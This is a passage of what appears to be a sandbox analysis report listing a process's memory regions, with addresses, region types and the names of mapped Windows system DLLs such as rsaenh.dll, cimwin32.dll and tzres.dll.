end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5016
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 5017
start_va = 0x7fef5040000
end_va = 0x7fef5051fff
monitored = 0
entry_point = 0x7fef50489d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 5018
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 5019
start_va = 0x3c0000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 5020
start_va = 0x160000
end_va = 0x188fff
monitored = 0
entry_point = 0x161010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5021
start_va = 0x4c0000
end_va = 0x647fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 5022
start_va = 0x160000
end_va = 0x188fff
monitored = 0
entry_point = 0x161010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5023
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5024
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5025
start_va = 0x2c0000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 5026
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 5027
start_va = 0x650000
end_va = 0x7d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 5028
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5029
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5030
start_va = 0x7e0000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5031
start_va = 0x940000
end_va = 0xc0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5032
start_va = 0x60000
end_va = 0x64fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 5033
start_va = 0x7e0000
end_va = 0x85cfff
monitored = 0
entry_point = 0x7ecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5034
start_va = 0x8c0000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 5035
start_va = 0x7e0000
end_va = 0x85cfff
monitored = 0
entry_point = 0x7ecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5036
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 5037
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5038
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5039
start_va = 0xd60000
end_va = 0xddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d60000"
filename = ""
Region:
id = 5040
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 5041
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 5042
start_va = 0xe10000
end_va = 0xe8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 5043
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 5044
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 5045
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 5046
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 5047
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 5048
start_va = 0x7e0000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5049
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 5050
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 5051
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5052
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5053
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5054
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5055
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5056
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5057
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 5058
start_va = 0xc70000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 5059
start_va = 0xf50000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f50000"
filename = ""
Region:
id = 5060
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 5061
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 5062
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 5063
start_va = 0x1100000
end_va = 0x117ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 5064
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 5065
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 5066
start_va = 0x7fef4a50000
end_va = 0x7fef4c49fff
monitored = 1
entry_point = 0x7fef4a64c9c
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 5067
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 5068
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5069
start_va = 0x190000
end_va = 0x195fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 5070
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 5071
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5072
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5073
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5074
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5075
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5076
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5077
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5078
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5079
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5080
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5081
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5082
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5083
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5084
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5085
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5086
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5087
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5088
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5089
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5090
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5091
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5092
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5093
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5094
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5095
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5096
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5097
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5098
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5099
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5100
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5101
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5102
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5103
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5104
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5105
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5106
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5107
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5108
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5109
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5110
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5111
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5112
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5113
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5114
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5115
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5116
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5117
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5118
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5119
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5120
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5121
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5122
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5123
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5124
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5125
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5126
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5127
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5128
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5129
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5130
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5131
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5132
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5133
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5134
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5135
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5136
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5137
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5138
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
